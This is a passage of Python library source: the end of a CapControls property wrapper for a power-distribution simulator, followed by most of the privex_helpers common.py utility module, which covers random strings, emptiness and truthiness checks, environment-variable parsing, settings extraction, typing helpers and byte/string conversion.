        # ``(dss, argument)`` tuple and forwards both to the parent writer --
        # confirm against CapControlsI._monitored_term_write's signature.
        dss, argument = values
        CapControlsI._monitored_term_write(self, dss, argument)

    @property
    def use_volt_override(self) -> int:
        """Gets/sets whether Vmin and Vmax are enabled to override the control Mode.

        There is no explicit return type in the official documentation, so
        nothing beyond ``int`` is asserted here.
        """
        return CapControlsI._use_volt_override(self)

    @use_volt_override.setter
    def use_volt_override(self, values):
        # NOTE(review): same ``(dss, argument)`` tuple convention as
        # ``monitored_term`` -- confirm against the parent writer's signature.
        dss, argument = values
        CapControlsI._use_volt_override_write(self, dss, argument)

    @property
    def count(self) -> int:
        """Gets the number of CapControls in the Active Circuit."""
        return CapControlsI._count(self)

    @property
    def names(self) -> List[str]:
        """Gets a variant array of strings with all CapControl names."""
        return CapControlsV._names(self)

    @property
    def ct_ratio(self) -> float:
        """Gets/sets the transducer ratio from current to control current."""
        return CapControlsF._ct_ratio(self)

    @ct_ratio.setter
    def ct_ratio(self, argument: float):
        CapControlsF._ct_ratio_write(self, argument)

    @property
    def pt_ratio(self) -> float:
        """Gets/sets the transducer ratio from primary feeder to control voltage."""
        # Docstring moved here from the setter: ``property`` only exposes the
        # getter's docstring, so help()/IDE tooltips never saw the old one.
        return CapControlsF._pt_ratio(self)

    @pt_ratio.setter
    def pt_ratio(self, argument: float):
        CapControlsF._pt_ratio_write(self, argument)

    @property
    def on_setting(self) -> float:
        """Gets/sets the threshold to arm or switch on a step. See Mode for units."""
        return CapControlsF._on_setting(self)

    @on_setting.setter
    def on_setting(self, argument: float):
        CapControlsF._on_setting_write(self, argument)

    @property
    def off_setting(self) -> float:
        """Gets/sets the threshold to switch off a step. See Mode for units."""
        # Docstring moved here from the setter (see ``pt_ratio``).
        return CapControlsF._off_setting(self)

    @off_setting.setter
    def off_setting(self, argument: float):
        CapControlsF._off_setting_write(self, argument)

    @property
    def vmax(self) -> float:
        """Gets/sets Vmax: with VoltOverride, switch OFF whenever the PT voltage exceeds this level."""
        return CapControlsF._vmax(self)

    @vmax.setter
    def vmax(self, argument: float):
        CapControlsF._vmax_write(self, argument)

    @property
    def vmin(self) -> float:
        """Gets/sets Vmin: with VoltOverride, switch ON whenever the PT voltage drops below this level."""
        return CapControlsF._vmin(self)

    @vmin.setter
    def vmin(self, argument: float):
        CapControlsF._vmin_write(self, argument)

    @property
    def delay(self) -> float:
        """Gets/sets the time delay [s] to switch on after arming. The control may reset before actually switching."""
        return CapControlsF._delay(self)

    @delay.setter
    def delay(self, argument: float):
        CapControlsF._delay_write(self, argument)

    @property
    def delay_off(self) -> float:
        """Gets/sets the time delay [s] before switching off a step. The control may reset before actually switching."""
        return CapControlsF._delay_off(self)

    @delay_off.setter
    def delay_off(self, argument: float):
        CapControlsF._delay_off_write(self, argument)

    @property
    def dead_time(self) -> float:
        """Gets/sets the time delay [s] after switching off a step. The control may reset before actually switching."""
        return CapControlsF._dead_time(self)

    @dead_time.setter
    def dead_time(self, argument: float):
        CapControlsF._dead_time_write(self, argument)

    @property
    def name(self) -> str:
        """Gets the name of the active CapControl; setting it makes that CapControl active."""
        return CapControlsS._name(self)

    @name.setter
    def name(self, argument: str):
        CapControlsS._name_write(self, argument)

    @property
    def controlled_capacitor(self) -> str:
        """Gets/sets the name of the capacitor that is controlled."""
        return CapControlsS._controlled_capacitor(self)

    @controlled_capacitor.setter
    def controlled_capacitor(self, argument: str):
        CapControlsS._controlled_capacitor_write(self, argument)

    @property
    def monitored_object(self) -> str:
        """Gets/sets the full name of the element that the PT and CT are connected to."""
        return CapControlsS._monitored_object(self)

    @monitored_object.setter
    def monitored_object(self, argument: str):
        CapControlsS._monitored_object_write(self, argument)

    def first(self) -> int:
        """Sets the first CapControl active. Returns 0 if there are none."""
        return CapControlsI._first(self)

    def next(self) -> int:
        """Sets the next CapControl active. Returns 0 if there are no more."""
        return CapControlsI._next(self)
|
PypiClean
|
/privex_helpers-3.2.1-py3-none-any.whl/privex/helpers/common.py
|
import inspect
import math
import os
import random
import re
import shlex
import string
import argparse
import logging
import subprocess
import sys
from collections import OrderedDict
from decimal import Decimal, getcontext
from os import getenv as env
from subprocess import PIPE, STDOUT
from typing import Callable, Sequence, List, Union, Tuple, Type, Dict, Any, Iterable, Optional, BinaryIO, Generator, Mapping
from privex.helpers import settings
from privex.helpers.collections import DictObject, OrderedDictObject
from privex.helpers.types import T, K, V, C, USE_ORIG_VAR, STRBYTES, NumberStr
from privex.helpers.exceptions import NestedContextException
log = logging.getLogger(__name__)
SAFE_CHARS = 'abcdefhkmnprstwxyz23456789ACDEFGHJKLMNPRSTWXYZ'
"""Characters that shouldn't be mistaken, avoiding users confusing an o with a 0 or an l with a 1 or I"""
ALPHANUM = string.ascii_uppercase + string.digits + string.ascii_lowercase
"""All characters from a-z, A-Z, and 0-9 - for random strings where there's no risk of user font confusion"""
def random_str(size: int = 50, chars: Sequence = SAFE_CHARS) -> str:
    """
    Generate a random string of ``size`` characters drawn from ``chars``.

    Randomness comes from Python's :class:`random.SystemRandom`, which uses the
    OS entropy source (``/dev/urandom`` on Linux). The default character set
    :py:attr:`.SAFE_CHARS` is a-z / A-Z / 2-9 with easily-misread characters
    (``1``, ``l``, ``L``, ``0``, ``o``) removed; pass :py:attr:`.ALPHANUM` for
    the full upper/lowercase + digits set.

    Usage:

        >>> from privex.helpers import random_str
        >>> password = random_str()  # 50 chars from SAFE_CHARS
        'MrCWLYMYtT9A7bHc5ZNE4hn7PxHPmsWaT9GpfCkmZASK7ApN8r'
        >>> custom = random_str(12, chars='abcdef12345')
        'aba4cc14a43d'

    Warning: quality depends on the OS implementation, so this may not be
    cryptographically secure on non-Linux platforms.

    :param int size: Length of random string to generate (default 50 characters)
    :param str chars: Character set to draw from (default :py:attr:`.SAFE_CHARS`)
    """
    rng = random.SystemRandom()
    return ''.join(rng.choice(chars) for _ in range(size))
def empty(v, zero: bool = False, itr: bool = False) -> bool:
    """
    Quickly test whether a variable should be considered "blank".

    By default only ``None`` and ``''`` count as empty; opt in to extra checks
    with ``zero`` and ``itr``. Returns ``True`` when the value is empty,
    ``False`` otherwise.

    Example usage:

        >>> x, y = [], None
        >>> if empty(y):
        ...     print('Var y is None or a blank string')
        ...
        >>> if empty(x, itr=True):
        ...     print('Var x is None, blank string, or an empty dict/list/iterable')

    :param v: The variable to test for emptiness
    :param zero: when ``True``, int ``0`` and str ``'0'`` also count as empty
    :param itr: when ``True``, ``[]`` / ``{}`` / any zero-length sized object also count as empty
    :return bool is_blank: ``True`` if ``v`` is blank, ``False`` if it has content
    """
    # Membership test uses ==, matching e.g. 0.0 when zero=True.
    blank_values = [None, '', 0, '0'] if zero else [None, '']
    if v in blank_values:
        return True
    if itr:
        if v == [] or v == {}:
            return True
        if hasattr(v, '__len__') and len(v) == 0:
            return True
    return False
def empty_if(v: V, is_empty: K = None, not_empty: T = USE_ORIG_VAR, **kwargs) -> Union[T, K, V]:
    """
    Syntactic sugar for ``x if empty(y) else z``. If ``not_empty`` isn't specified, then the original value ``v``
    will be returned if it's not empty.

    **Example 1**::

        >>> def some_func(name=None):
        ...     name = empty_if(name, 'John Doe')
        ...     return name
        >>> some_func("")
        John Doe
        >>> some_func("Dave")
        Dave

    **Example 2**::

        >>> empty_if(None, 'is empty', 'is not empty')
        is empty
        >>> empty_if(12345, 'is empty', 'is not empty')
        is not empty

    :param Any v: The value to test for emptiness
    :param is_empty: The value to return if ``v`` is empty (defaults to ``None``)
    :param not_empty: The value to return if ``v`` is not empty (defaults to the original value ``v``)
    :param kwargs: Any additional kwargs to pass to :func:`.empty`
    :key zero: if ``zero=True``, then v is empty if it's int ``0`` or str ``'0'``
    :key itr: if ``itr=True``, then v is empty if it's ``[]``, ``{}``, or is an iterable and has 0 length
    :return V orig_var: The original value ``v`` is returned if ``not_empty`` isn't specified.
    :return K is_empty: The value specified as ``is_empty`` is returned if ``v`` is empty
    :return T not_empty: The value specified as ``not_empty`` is returned if ``v`` is not empty
                         (and not_empty was specified)
    """
    # Compare against the sentinel by identity, not equality: ``==`` can be
    # hijacked (or even raise) for user types with a custom __eq__, such as
    # numpy arrays, whereas ``is`` only matches the sentinel object itself.
    if not_empty is USE_ORIG_VAR:
        not_empty = v
    return is_empty if empty(v, **kwargs) else not_empty
def is_true(v) -> bool:
    """
    Check whether a bool/str/int value represents ``True``:

    * **bool**: ``True``
    * **str**: ``'true'``, ``'yes'``, ``'y'``, ``'1'`` (lowercased first)
    * **int**: ``1``

    Usage:

        >>> is_true('true')
        True
        >>> is_true('no')
        False

    :param Any v: The value to check for truthfulness
    :return bool is_true: ``True`` if the value appears truthy, otherwise ``False``.
    """
    # Exact str type check (not isinstance) preserves behaviour for str subclasses.
    needle = v.lower() if type(v) is str else v
    return needle in (True, 'true', 'yes', 'y', '1', 1)
def is_false(v, chk_none: bool = True) -> bool:
    """
    Check whether a bool/str/int value represents ``False``:

    * **bool**: ``False``
    * **str**: ``'false'``, ``'no'``, ``'n'``, ``'0'`` (lowercased first)
    * **int**: ``0``

    With ``chk_none=True`` (the default), ``None`` / ``'null'`` / ``'none'`` / ``''``
    are also treated as falsey.

    **Warning:** Unless you specifically need to verify a value is Falsey, it's
    usually safer to check for truth with :py:func:`.is_true` and invert the
    result, i.e. ``if not is_true(v)``.

    Usage:

        >>> is_false(0)
        True
        >>> is_false('yes')
        False

    :param Any v: The value to check for falseyness
    :param bool chk_none: If ``True``, treat ``None``/``'none'``/``'null'`` as Falsey (default ``True``)
    :return bool is_False: ``True`` if the value appears falsey, otherwise ``False``.
    """
    needle = v.lower() if type(v) is str else v
    falsey = [False, 'false', 'no', 'n', '0', 0]
    if chk_none:
        falsey += [None, 'none', 'null', '']
    return needle in falsey
def parse_keyval(line: str, valsplit: str = ':', csvsplit=',') -> List[Tuple[str, str]]:
    """
    Parse a csv of key:value pairs such as::

        John Alex:Doe,Jane Sarah:Doe

    into a list of (key, value) tuples (easily converted to a dict)::

        [
            ('John Alex', 'Doe'),
            ('Jane Sarah', 'Doe')
        ]

    By default a colon ``:`` separates key from value and a comma ``,``
    terminates each pair; override via ``valsplit`` / ``csvsplit``.

    :param str line: A string of key:value pairs separated by commas e.g. ``John Alex:Doe,Jane Sarah:Doe``
    :param str valsplit: A character (or several) used to split the key from the value (default: colon ``:``)
    :param str csvsplit: A character (or several) used to terminate each keyval pair (default: comma ``,``)
    :return List[Tuple[str,str]] parsed_data: A list of (key, value) tuples that can easily be casted to a dict()
    """
    if line == '':
        return []
    # Split into pairs first; whitespace around keys/values is stripped after.
    raw_pairs = [tuple(chunk.split(valsplit)) for chunk in line.split(csvsplit)]
    return [(k.strip(), val.strip()) for k, val in raw_pairs]
def parse_csv(line: str, csvsplit: str = ',') -> List[str]:
    """
    Quick n' dirty parsing of a simple separated line, stripping whitespace
    from both the ``line`` itself and each resulting value.

    Example:

        >>> parse_csv(' hello , world, test')
        ['hello', 'world', 'test']
        >>> parse_csv(' world ; test ; example', csvsplit=';')
        ['world', 'test', 'example']

    :param str line: A string of columns separated by commas e.g. ``hello,world,foo``
    :param str csvsplit: A character (or several) used to terminate each value in the list. Default: comma ``,``
    """
    columns = line.strip().split(csvsplit)
    return [col.strip() for col in columns]
def env_csv(env_key: str, env_default=None, csvsplit=',') -> List[str]:
    """
    Quick n' dirty parsing of a simple CSV-formatted environment variable,
    falling back to ``env_default`` (default ``None``) when unset/empty.

    Example:

        >>> import os
        >>> os.environ['EXAMPLE'] = ' hello , world, test'
        >>> env_csv('EXAMPLE', [])
        ['hello', 'world', 'test']
        >>> env_csv('NONEXISTANT', [])
        []

    :param str env_key: Environment var to attempt to load
    :param any env_default: Fallback value if the env var is empty / not set (Default: None)
    :param str csvsplit: A character (or several) used to terminate each value in the list. Default: comma ``,``
    :return List[str] parsed_data: A list of str values parsed from the env var
    """
    raw = env(env_key)
    if empty(raw):
        return env_default
    return parse_csv(raw, csvsplit=csvsplit)
def env_keyval(env_key: str, env_default=None, valsplit=':', csvsplit=',') -> List[Tuple[str, str]]:
    """
    Parse an environment variable containing ``key:val,key:val`` into a list of
    tuples ``[(key, val), (key, val)]`` — see :py:meth:`parse_keyval`.

    :param str env_key: Environment var to attempt to load
    :param any env_default: Fallback value if the env var is empty / not set (Default: None)
    :param str valsplit: A character (or several) used to split the key from the value (default: colon ``:``)
    :param str csvsplit: A character (or several) used to terminate each keyval pair (default: comma ``,``)
    """
    raw = env(env_key)
    if empty(raw):
        return env_default
    return parse_keyval(raw, valsplit=valsplit, csvsplit=csvsplit)
def env_cast(env_key: str, cast: callable, env_default=None):
    """
    Obtains an environment variable ``env_key``; if it's empty or not set, ``env_default`` will be returned.
    Otherwise, it will be converted into a type of your choice using the callable ``cast`` parameter.

    Example:

        >>> os.environ['HELLO'] = '1.234'
        >>> env_cast('HELLO', Decimal, Decimal('0'))
        Decimal('1.234')

    :param callable cast: A function to cast the user's env data such as ``int`` ``str`` or ``Decimal`` etc.
    :param str env_key: Environment var to attempt to load
    :param any env_default: Fallback value if the env var is empty / not set (Default: None)
    """
    # Read the environment variable once — the original called env() twice,
    # which is wasteful and could (in principle) race with a concurrent change
    # to the environment between the emptiness check and the cast.
    raw = env(env_key)
    return env_default if empty(raw) else cast(raw)
def env_bool(env_key: str, env_default=None) -> Union[bool, None]:
    """
    Obtains an environment variable ``env_key``; if it's empty or not set,
    ``env_default`` is returned. Otherwise the value is converted into a
    boolean using :py:func:`.is_true`.

    Example:

        >>> os.environ['HELLO_WORLD'] = '1'
        >>> env_bool('HELLO_WORLD')
        True
        >>> env_bool('HELLO_NOEXIST')
        None
        >>> env_bool('HELLO_NOEXIST', 'error')
        'error'

    :param str env_key: Environment var to attempt to load
    :param any env_default: Fallback value if the env var is empty / not set (Default: None)
    """
    return env_cast(env_key, cast=is_true, env_default=env_default)
def env_int(env_key: str, env_default=None) -> int:
    """Alias for :py:func:`.env_cast`, casting the value with ``int``."""
    return env_cast(env_key, cast=int, env_default=env_default)
def env_decimal(env_key: str, env_default=None) -> Decimal:
    """Alias for :py:func:`.env_cast`, casting the value with ``Decimal``."""
    return env_cast(env_key, cast=Decimal, env_default=env_default)
def extract_settings(prefix: str, _settings=settings, defaults=None, merge_conf=None, **kwargs) -> dict:
    """
    Extract prefixed settings from a given module, dictionary, class, or instance.
    This helper function searches the object ``_settings`` for keys starting with ``prefix``, and for any matching keys, it removes
    the prefix from each key, converts the remaining portion of each key to lowercase (unless you've set ``_case_sensitive=True``),
    and then returns the keys their linked values as a ``dict``.
    For example, if you had a file called ``myapp/settings.py`` which contained ``REDIS_HOST = 'localhost'``
    and ``REDIS_PORT = 6379``, you could then run::
        >>> # noinspection PyUnresolvedReferences
        >>> from myapp import settings
        >>> extract_settings('REDIS_', settings)
        {'host': 'localhost', 'port': 6379}
    **Example uses**
    Example settings module at ``myapp/settings.py``
    .. code-block:: python
        from os.path import dirname, abspath, join
        BASE_DIR = dirname(dirname(dirname(abspath(__file__))))
        VERSION_FILE = join(BASE_DIR, 'privex', 'helpers', '__init__.py')
        REDIS_HOST = 'localhost'
        REDIS_PORT = 6379
        REDIS_DB = 0
        DEFAULT_CACHE_TIMEOUT = 300
    **Example - Extract Redis settings**::
        >>> # noinspection PyUnresolvedReferences
        >>> from myapp import settings
        >>> from privex.helpers import extract_settings
        >>>
        >>> # All keyword arguments (apart from _settings_mod and _keys_lower) are converted into a dictionary
        >>> # and merged with the extracted settings
        >>> # noinspection PyTypeChecker
        >>> extract_settings('REDIS_', _settings=settings, port=6479, debug=True)
        {'host': 'localhost', 'port': 6379, 'db': 0, 'debug': True}
        >>> extract_settings('REDIS_', _settings=settings, merge_conf=dict(port=6479))
        {'host': 'localhost', 'port': 6479, 'db': 0}
    **Example - Extract Redis settings - case sensitive mode**::
        >>> extract_settings('REDIS_', _settings=settings, _case_sensitive=True)
        {'HOST': 'localhost', 'PORT': 6379, 'DB': 0}
    **Example - Extract database settings from the environment**
    The below dict comprehension is just so you can see the original environment keys before we run ``extract_settings``::
        >>> import os
        >>> from privex.helpers import extract_settings
        >>>
        >>> {k: v for k,v in os.environ.items() if 'DB_' in k}
        {'DB_USER': 'root',
         'DB_PASS': 'ExamplePass',
         'DB_NAME': 'example_db'}
    We'll now call ``extract_settings`` using :attr:`os.environ` converted into a dictionary, and attempt to quickly
    obtain the database settings - with lowercase keys, and without their ``DB_`` prefix.
    Below, you'll see extract_settings extracted all keys starting with ``DB_``, removed the ``DB_`` prefix, converted the
    remaining portion of the key to lowercase, and also merged in the default setting 'host' since ``DB_HOST`` didn't exist.
    The outputted dictionary is perfect for passing to many database library constructors::
        >>> extract_settings('DB_', dict(os.environ), host='localhost')
        {'user': 'root',
         'pass': 'ExamplePass',
         'name': 'example_db',
         'host': 'localhost'}
    :param str prefix: The prefix (including the first underscore (``_``) or other separator) to search for in the settings
    :param Module|dict|object _settings: The object to extract the settings from. The object can be one of the following:
         * A ``module``, for example passing ``settings`` after running ``from myapp import settings``
         * A ``dict``, for example ``extract_settings('X_', dict(X_A=1, X_B=2))``
         * A class which has the desired settings defined on it's ``.__dict__`` (e.g. any standard user
           class - ``class MyClass:``, with settings defined as static class attributes)
         * An instance of a class, which has all desired settings defined inside of ``.__dict__`` (e.g. any standard user class instance,
           with static and/or instance attributes for each setting)
         * Any other type which supports being casted to a dictionary via ``dict(obj)``.
    :param dict merge_conf: Optionally you may specify a dictionary of "override" settings to merge with the extracted settings.
                            The values in this dictionary take priority over both ``defaults``, and the keys from ``_settings``.
    :param dict defaults: Optionally you may specify a dictionary of default settings to merge **before** the extracted settings,
                          meaning values are only used if the key wasn't present in the extracted settings nor ``merge_conf``.
    :param kwargs: Additional settings as keyword arguments (see below). Any keyword argument keys which aren't valid settings will
                   be added to the ``defaults`` dictionary.
                   This means that defaults can also be specified as kwargs - as long as they don't clash with any
                   used kwarg settings (see below).
    :key _case_sensitive: (Default ``False``) If ``True``, ``prefix`` is compared against ``_settings`` keys case sensitively.
                          If ``False``, then both ``prefix`` and each ``_settings`` key is converted to lowercase before comparison.
    :key _keys_lower: Defaults to ``True`` if _case_sensitive is False, and ``False`` if _case_sensitive is True.
                      If ``True``, each extracted settings key is converted to lowercase before returning them - otherwise they're
                      returned with the same case as they were in ``_settings``.
    :return dict config: The extracted configuration keys (without their prefixes) and values as a dictionary.
                         Based on the extracted keys from ``_settings``, the fallback settings in ``defaults`` (and excess ``kwargs``),
                         plus the override settings in ``merge_conf``.
    """
    # Control kwargs are popped out first so the remaining kwargs can be merged
    # into the result as extra default settings.
    case_sensitive = kwargs.pop('_case_sensitive', False)
    keys_lower = kwargs.pop('_keys_lower', not case_sensitive)
    # Copy defaults/merge_conf so we never mutate caller-supplied dicts.
    defaults = {} if defaults is None else dict(defaults)
    merge_conf = {} if merge_conf is None else dict(merge_conf)
    # Normalise _settings into a plain dict of candidate settings keys.
    if isinstance(_settings, dict):
        set_dict = dict(_settings)
    elif type(_settings).__name__ == 'module' or isinstance(_settings, object) or inspect.isclass(_settings):
        # Modules, classes and instances expose their settings via __dict__.
        set_dict = dict(_settings.__dict__)
    else:
        try:
            # Last resort: try casting the object straight to a dict.
            # noinspection PyTypeChecker
            set_dict = dict(_settings)
            # If the cast produced an empty dict from a non-empty object, the
            # cast silently lost data - fall back to __dict__ instead.
            # noinspection PyTypeChecker
            if len(set_dict.keys()) < 1 <= len(_settings): raise Exception()
        except Exception:
            set_dict = dict(_settings.__dict__)
    set_conf = {}
    for k, v in set_dict.items():
        l = len(prefix)
        # Compare only the leading len(prefix) characters of each key.
        matched = (k[:l] == prefix) if case_sensitive else (k[:l].lower() == prefix.lower())
        if matched:
            _key = k[l:]
            _key = _key.lower() if keys_lower else _key
            set_conf[_key] = v
    # Precedence (lowest to highest): defaults < extracted < extra kwargs < merge_conf.
    return {**defaults, **set_conf, **kwargs, **merge_conf}
def get_return_type(f: callable) -> Optional[Union[type, object, callable]]:
    """
    Extract the annotated return type of a function/method. Only works when the
    return type is annotated, e.g. ``def somefunc(x: int) -> float: return x * 2.1``

    .. Attention:: If you want generic :mod:`typing` types simplified down to their
                   native Python base types (so they can be compared with
                   :func:`.isinstance` etc.), use :func:`.extract_type` instead.

    **Example 1** - a generic return type::

        >>> def list_wrap(v: T) -> List[T]:
        ...     return [v]
        ...
        >>> rt = get_return_type(list_wrap)
        typing.List[~T]
        >>> rt._name            # String type name
        'List'
        >>> l = rt.__args__[0]  # The types inside the [] are in .__args__
        ~T
        >>> l.__name__
        'T'

    **Example 2** - no return annotation simply yields ``None``::

        >>> def hello(x):
        ...     return x * 5
        >>> repr(get_return_type(hello))
        'None'

    :param callable f: A function/method to extract the return type from
    :return return_type: The return type, usually either a :class:`.type` or a :class:`.object`
    """
    if f is None:
        return None
    # Classes (and anything that isn't a plain function/method/coroutine
    # function) are passed straight through unchanged.
    func_like = inspect.isfunction(f) or inspect.ismethod(f) or inspect.iscoroutinefunction(f)
    if inspect.isclass(f) or not func_like:
        return f
    # noinspection PyUnresolvedReferences,PyProtectedMember
    annotation = inspect.signature(f).return_annotation
    if annotation is inspect._empty or empty(annotation, True):
        return None
    return annotation
def typing_to_base(tp, fail=False, return_orig=True, clean_union=True) -> Optional[Union[type, object, callable, tuple, Tuple[type]]]:
    """
    Reduce a :mod:`typing` object down to native Python base type(s) - handles generics such as ``List[str]``
    as well as combined types like ``Union[list, str]``.

        >>> typing_to_base(List[str])
        list
        >>> typing_to_base(Union[str, Dict[str, list], int])
        (str, dict, int)
        >>> typing_to_base(str)
        str
        >>> repr(typing_to_base(str, return_orig=False))
        'None'

    :param tp: The :mod:`typing` type object to extract base/native type(s) from.
    :param bool fail: (Default: ``False``) Raise :class:`.TypeError` when ``tp`` isn't a :mod:`typing` type.
    :param bool return_orig: (Default: ``True``) Return ``tp`` unchanged when it isn't a typing type;
                             when ``False``, non-typing types yield ``None`` instead.
    :param bool clean_union: (Default: ``True``) Pass each member of a :class:`typing.Union` through
                             :func:`.extract_type` to simplify it to a native type.
    :return type_res: A base :class:`.type`, a :class:`.tuple` of types, a typing object, or something else
                      depending on what ``tp`` was.
    """
    # Union generics (including Optional[]) can't be used with isinstance(), so we identify
    # them by their repr string instead.
    if repr(tp).startswith('typing.Union['):
        # noinspection PyUnresolvedReferences
        members = tp.__args__
        collected = []
        for member in members:
            try:
                # Each Union member may itself be a generic (e.g. List[str]) - extract_type simplifies it.
                collected.append(extract_type(member) if clean_union else member)
            except Exception as e:
                log.warning("Error while extracting type for %s (part of %s). Reason: %s - %s", member, repr(tp), type(e), str(e))
                collected.append(member)
        return tuple(collected)
    # Python 3.6: __origin__ holds the typing type, while __orig_bases__ is a tuple whose first
    # entry is the native base type. Python 3.7+: __origin__ holds the native type directly
    # and __orig_bases__ doesn't exist on typing generics.
    if hasattr(tp, '__orig_bases__'):
        return tp.__orig_bases__[0]
    # __origin__ / __extra__ are exposed by typing generics such as Dict[str, str]
    # original SO answer: https://stackoverflow.com/a/54241536/2648583
    for attr in ('__origin__', '__extra__'):
        if hasattr(tp, attr):
            return getattr(tp, attr)
    if fail:
        raise TypeError(f"Failed to extract base type for type object: {repr(tp)}")
    return tp if return_orig else None
def extract_type(tp: Union[type, callable, object], **kwargs) -> Optional[Union[type, object, callable, tuple, Tuple[type]]]:
    """
    Identify the :class:`.type` of a given value - or, for functions/methods, the type of their RETURN value.

    Generic :mod:`typing` types such as ``List[str]`` are simplified down to their native base type
    (e.g. :class:`.list`), making the result usable with :func:`.isinstance`. :class:`typing.Union`
    (and :class:`typing.Optional`) types become a tuple of base types, with nested Unions flattened.

    .. Attention:: To obtain the ORIGINAL (unsimplified) return type of a function/method, including
                   generics such as ``List[str]``, use :func:`.get_return_type` instead.

    Examples::

        >>> extract_type(Dict[str, str])
        dict
        >>> def list_wrap(v: T) -> List[T]:
        ...     return [v]
        >>> extract_type(list_wrap)
        list
        >>> def hello(x) -> Optional[str]:
        ...     return x * 5
        >>> extract_type(hello)
        (str, NoneType)

    Instances are resolved to their class, so ``extract_type(DictObject(a=1))`` returns the
    ``DictObject`` class itself.

    If ``tp`` is an object whose class can't be determined, it's returned as-is; likewise an unusual
    callable whose return type can't be extracted may be returned in its original form.

    :param tp: The type/object/function etc. to extract the most accurate type from
    :return type|object|callable ret: Usually a :class:`.type` (or tuple of types for Unions), but may be
                                      an :class:`.object` or :class:`.callable` if detection failed.
    """
    # Nothing useful can be extracted from None.
    if tp is None:
        return None
    # Known native types need no extraction at all.
    if tp in [list, set, tuple, dict, str, bytes, int, float, Decimal]:
        return tp
    looks_func = inspect.isfunction(tp) or inspect.ismethod(tp) or inspect.iscoroutinefunction(tp)
    # Functions are themselves instances of object, so to narrow down a genuine class instance /
    # typing generic, we require tp NOT to be a function/method/coro but to be an object instance.
    if not looks_func and isinstance(tp, object):
        # Possibly a typing generic (List[str], Union[...], etc.) - try reducing it to base type(s).
        reduced = typing_to_base(tp, return_orig=False)
        # A non-None result means tp really was a typing type and was reduced successfully.
        if reduced is not None:
            return reduced
        # Not a typing type - if tp is an INSTANCE (not a class), __class__ gives us its type.
        if not inspect.isclass(tp) and hasattr(tp, '__class__'):
            return tp.__class__
        return tp  # If all else fails, return tp as-is
    # At this point tp is a function/method/coroutine - extract its return type and recurse once.
    # '_sec_layer' guards against an infinite loop should the return type itself be a function.
    if looks_func and not kwargs.get('_sec_layer'):
        returned = get_return_type(tp)
        # A generic return type like List[str] can't be used with isinstance(), so run it
        # through extract_type again to simplify it down to a native type.
        return extract_type(returned, _sec_layer=True)
    # If all else fails, return tp as-is
    return tp
def dec_round(amount: Decimal, dp: int = 2, rounding=None) -> Decimal:
    """
    Round a :class:`.Decimal` to ``dp`` decimal places using ``quantize`` (``dp`` must be >= 1, default 2).

    When ``rounding`` is omitted, the rounding mode currently set in :py:func:`decimal.getcontext` is
    used (``ROUND_HALF_EVEN`` on most Python versions).

        >>> from decimal import Decimal, getcontext, ROUND_FLOOR
        >>> x = Decimal('1.9998')
        >>> dec_round(x, 3)
        Decimal('2.000')
        >>> dec_round(x, 3, rounding=ROUND_FLOOR)
        Decimal('1.999')

    :param Decimal amount: The amount (as a Decimal) to round
    :param int dp: Number of decimal places to round ``amount`` to. (Default: 2)
    :param str rounding: A :py:mod:`decimal` rounding option, e.g. ``ROUND_HALF_EVEN`` or ``ROUND_FLOOR``
    :return Decimal rounded: The rounded Decimal amount
    """
    dp = int(dp)
    if dp <= 0:
        raise ArithmeticError('dec_round expects dp >= 1')
    if not rounding:
        rounding = getcontext().rounding
    # Build a quantize template with 'dp' digits after the point, e.g. dp=3 -> Decimal('0.001')
    template = Decimal('0.' + ('0' * (dp - 1)) + '1')
    return Decimal(amount).quantize(template, rounding=rounding)
def chunked(iterable, n):
    """Split a sliceable ``iterable`` into ``n`` chunks of similar size (returned lazily as a generator).

    Examples::

        >>> list(chunked([1, 2, 3, 4], 4))
        [[1], [2], [3], [4]]
        >>> list(chunked([1, 2, 3], 4))
        [[1], [2], [3], []]
        >>> list(chunked([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 4))
        [[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]

    Taken from: https://stackoverflow.com/a/24484181/2648583
    """
    # Chunk size is ceil(len/n) so all items fit into exactly n slices (trailing slices may be short/empty).
    per_chunk = int(math.ceil(len(iterable) / n))
    return (iterable[i * per_chunk:(i + 1) * per_chunk] for i in range(n))
def inject_items(items: list, dest_list: list, position: int) -> List[str]:
    """
    Return a **NEW list**: a copy of ``dest_list`` with ``items`` inserted immediately after the
    element at index ``position``. ``dest_list`` itself is NOT modified.

    **Example Usage**::

        >>> x = ['a', 'b', 'e', 'f', 'g']
        >>> y = ['c', 'd']
        >>> # Inject the list 'y' into list 'x' after element 1 (b)
        >>> inject_items(y, x, 1)
        ['a', 'b', 'c', 'd', 'e', 'f', 'g']

    :param list items: A list of items to inject into ``dest_list``
    :param list dest_list: The list to inject ``items`` into
    :param int position: Inject ``items`` after this element (0 = 1st item) in ``dest_list``
    :return List[str] injected: A copy of ``dest_list`` with ``items`` injected at ``position``
    """
    # Copy first, then splice 'items' in via slice assignment - leaves dest_list untouched.
    merged = list(dest_list)
    merged[position + 1:position + 1] = items
    return merged
def byteify(data: Optional[Union[str, bytes]], encoding='utf-8', if_none=None) -> bytes:
    """
    Convert ``data`` into :class:`.bytes` if it isn't bytes already::

        >>> byteify("hello world")
        b"hello world"

    When ``data`` is ``None``, :func:`bytes` raises a :class:`TypeError` by default. To convert ``None``
    into something else (e.g. an empty bytes string), pass ``if_none``::

        >>> byteify(None)
        TypeError: encoding without a string argument
        >>> byteify(None, if_none="")
        b''
    """
    # Substitute the fallback value when data is None and a fallback was supplied.
    if data is None and if_none is not None:
        data = if_none
    # Already bytes (incl. a bytes if_none) - pass straight through; otherwise encode.
    if type(data) is bytes:
        return data
    return bytes(data, encoding)
def stringify(data: Optional[Union[str, bytes]], encoding='utf-8', if_none=None) -> str:
    """
    Convert ``data`` into a :class:`str` (decoding from bytes) if it isn't one already::

        >>> stringify(b"hello world")
        "hello world"

    ``None`` input returns ``None`` by default; supply ``if_none`` to substitute another value::

        >>> repr(stringify(None))
        'None'
        >>> stringify(None, if_none="")
        ''
    """
    if data is None:
        return if_none
    # Only bytes need decoding; anything else is passed through untouched.
    if type(data) is bytes:
        return data.decode(encoding)
    return data
class ErrHelpParser(argparse.ArgumentParser):
    """
    Drop-in replacement for :py:class:`argparse.ArgumentParser` which, when arguments are invalid,
    prints the error message AND the full help output - instead of only the error message.

    >>> parser = ErrHelpParser(description='My command line app')
    >>> parser.add_argument('nums', metavar='N', type=int, nargs='+')
    """
    def error(self, message):
        # Emit the error, then the full help text, then exit with status 2 (argparse's usual error code).
        sys.stderr.write(f'error: {message}\n')
        self.print_help()
